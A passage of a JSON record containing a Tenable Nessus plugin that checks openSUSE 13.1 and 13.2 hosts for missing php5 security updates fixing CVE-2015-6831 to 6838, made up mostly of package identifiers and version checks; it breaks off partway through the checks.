"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-609.NASL", "href": "https://www.tenable.com/plugins/nessus/86183", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-609.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86183);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2015-609)\");\n script_summary(english:\"Check for the openSUSE-2015-609 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP5 script interpreter was updated to fix various security \nissues :\n\n - CVE-2015-6831: A use after free vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#942291]\n [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization\n of ArrayObject items could be used to crash php or\n potentially execute code. [bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP\n files could be used to overwrite files outside of\n intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945403] \n\n - CVE-2015-6835: A Use After Free Vulnerability in session\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945428\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debugsource-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-devel-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pear-5.4.20-67.1\") ) flag++;\nif ( 